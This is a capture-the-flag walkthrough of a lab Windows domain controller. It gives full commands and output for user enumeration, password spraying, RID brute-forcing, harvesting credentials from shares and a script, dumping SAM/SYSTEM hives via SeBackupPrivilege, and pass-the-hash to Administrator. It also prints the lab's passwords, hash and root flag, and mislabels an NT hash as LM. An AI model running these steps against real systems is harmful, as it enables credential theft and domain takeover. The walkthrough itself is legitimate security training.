Cicada

Easy Windows Active Directory Box

Reconnaissance

As always we start off by performing a port scan to enumerate services and versions running on the target using Nmap

nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.11.35

Nmap scan report for 10.10.11.35
Host is up (0.043s latency).
Not shown: 65522 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-02 19:43:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
51785/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-08-02T19:44:39
|_  start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug  2 13:45:19 2025 -- 1 IP address (1 host up) scanned in 122.75 seconds

We can notice we're facing a DC (Domain Controller) Because of the simultaneously open ports like TCP 88 (Kerberos) | TCP 389 (LDAP) | TCP 5985 (WinRM) ... which is common for DCs, we can also see the virtual host which is cicada.htb and CICADA-DC.cicada.htb so let's add them to our /etc/hosts file

We already know that following a good methodology is the most important on a pentest therefore we will need to enumerate every single thing that may contain useful information

so let's start by enumerating the open TCP Pport 53 (DNS) using dig

dig @10.10.11.35 cicada.htb NS
...
dig @10.10.11.35 cicada.htb MX
...
dig @10.10.11.35 cicada.htb TXT
...
dig @10.10.11.35 cicada.htb AXFR
...

This time the records didn't contain anything useful so let's move on to enumerate the TCP Port 88 (Kerberos) using the Kerbrute tool to try and enumerate possible users:

kerbrute userenum --dc 10.10.11.35 -d cicada.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 08/02/25 - Ronnie Flathers @ropnop

2025/08/02 14:53:00 >  Using KDC(s):
2025/08/02 14:53:00 >  	10.10.11.35:88

2025/08/02 14:53:03 >  [+] VALID USERNAME:	guest@cicada.htb
2025/08/02 14:53:08 >  [+] VALID USERNAME:	administrator@cicada.htb

We see that the user Guest is available so it will help us with further enumeration using NULL sessions

Now let's enumerate the TCP Port 135 (RPC) using the tool rpcclient with the use of a NULL session

rpcclient -U "Guest" 10.10.11.35
Password for [WORKGROUP\Guest]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED

We also didn't extract any information there so let's continue our reconnaissance

Let's try and enumerate TCP Port 445 (SMB) with the use of Netexec (Newer version of CrackMapExec)

netexec smb 10.10.11.35 -u 'guest' -p '' --shares
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV                             
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL                          Logon server share 

The HR (Human Resources?) share seems interesting, so let's check it using smbcient

smbclient -U 'guest' //10.10.11.35/HR

And we see it contains a file called Notice from HR.txt with this information:

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

And we finally found a password! — Cicada$M6Corpb*@Lp#nZp!8

After prforming a password spray with Kerbrute we see it doesnt work with any user

kerbrute passwordspray --verbose -d cicada.htb --dc 10.10.11.35 users.txt 'Cicada$M6Corpb*@Lp#nZp!8'

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 08/02/25 - Ronnie Flathers @ropnop

2025/08/02 15:16:29 >  Using KDC(s):
2025/08/02 15:16:29 >  	10.10.11.35:88

2025/08/02 15:16:29 >  [!] Guest@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2025/08/02 15:16:29 >  [!] krbtgt@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - USER LOCKED OUT
2025/08/02 15:16:29 >  [!] john.smoulder@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 >  [!] emily.oscars@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 >  [!] Administrator@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 >  [!] michael.wrightson@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 >  [!] sarah.dantelia@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 >  [!] david.orelious@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 >  [!] CICADA-DC$@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8 - Invalid password
2025/08/02 15:16:29 >  Done! Tested 9 logins (0 successes) in 0.101 seconds

RID Brute-Force

As we didn't get any username let's try to enumerate usernames using a RID Brute-Force with netexec

netexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep "(SidTypeUser)"
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1601: CICADA\emily.oscars (SidTypeUser)

And finally, we found valid usernames, so let's add them into a user.txt file to further attacks

Further Enumeration

Some AD users don’t have Kerberos pre-authentication enabled. That means we can request a TGT for them without a password, and the KDC will send back a hash we can crack offline.

So we already have valid usernames — now we’re checking which ones are AS-REP Roastable

impacket-GetNPUsers cicada.htb/ -no-pass -usersfile users.txt -format john
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User CICADA-DC$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User john.smoulder doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sarah.dantelia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User michael.wrightson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User david.orelious doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User emily.oscars doesn't have UF_DONT_REQUIRE_PREAUTH set

But we see none of them are AS-REP Roastable either

Let's See if we can access through SMB trying the found password with every user using Netexec again

netexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
[*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) 
                                
                                -------- SNIP -----------
                                
[+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp  #nZp!8 
-Username-                    -Last PW Set-       -BadPW- -Description-                                               
Administrator                 2024-08-26 20:08:03 9       Built-in account for administering the computer/domain 
Guest                         2024-08-28 17:26:56 1       Built-in account for guest access to the computer/domain 
krbtgt                        2024-03-14 11:14:10 1       Key Distribution Center Service Account 
john.smoulder                 2024-03-14 12:17:29 9        
sarah.dantelia                2024-03-14 12:17:29 9        
michael.wrightson             2024-03-14 12:17:29 0        
david.orelious                2024-03-14 12:17:29 8       Just in case I forget my password is aRt$Lp#7t*VQ!3 
emily.oscars                  2024-08-22 21:20:17 8        
[*] Enumerated 8 local users: CICADA

And we see it works for the user michael.wrightson and we found something interesting too, what seems to be the password for the user david.orelious — aRt$Lp#7t*VQ!3

Let's try and enumerate the shares too using both of these credentials we found

netexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares

                                -------- SNIP -----------

SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV                             
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share 


netexec smb 10.10.11.35 -u users.txt -p 'aRt$Lp#7t*VQ!3' --shares

                                -------- SNIP -----------

SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV             READ            
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share 

We can see david.orelious has access to a new interesting share called DEV so let's enumerate it using smbclient as we did before

smbclient -U 'david.orelious' //10.10.11.35/DEV

And we found a script called Backup_Script.ps1 so let's see what's inside it

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

And we found the password for emily.oscars — Q!3@Lp#M6b*7t*Vt!!

Logging into the WinRM Service

Using these credentials we can successfully login into the WinRM service using evil-winrm

evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
                   
Evil-WinRM shell v3.7

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> 

And we're in!!

Using whoami /priv we find some misconfigurations:

Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

The one we're going to approach is the SeBackupPrivilege

Dumping SAM and System

It lets us read sensitive system files, even ones protected by the OS, so let's create a Temp directory under C:\

Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> mkdir C:\Temp
Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd C:\Temp

We can use this to dump the SAM and SYSTEM hives, which contain password hashes.

*Evil-WinRM* PS C:\Temp> reg save hklm\sam C:\Temp\sam.hive
*Evil-WinRM* PS C:\Temp> reg save hklm\system C:\Temp\system.hive

Then we can download these files into our attacker system with the Evil-WinRM download function, and finally dump them using impacket-secretsdump

impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

And then we can just do a Pass-The-Hash using Evil-WinRM with the obtained Administrator LM hash

evil-winrm -i 10.10.11.35 -u administrator -H '2b87e7c93a3e8a0ea4a581937016f341'

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
691c7231cdead497e605a022382efcb8

And there's the root flag, overall one of my favourite Active Directory HackTheBox boxes because of how much you need to enumerate and how it tests your recon skills.

Hope this helped you, thank you for reading and see you next time!!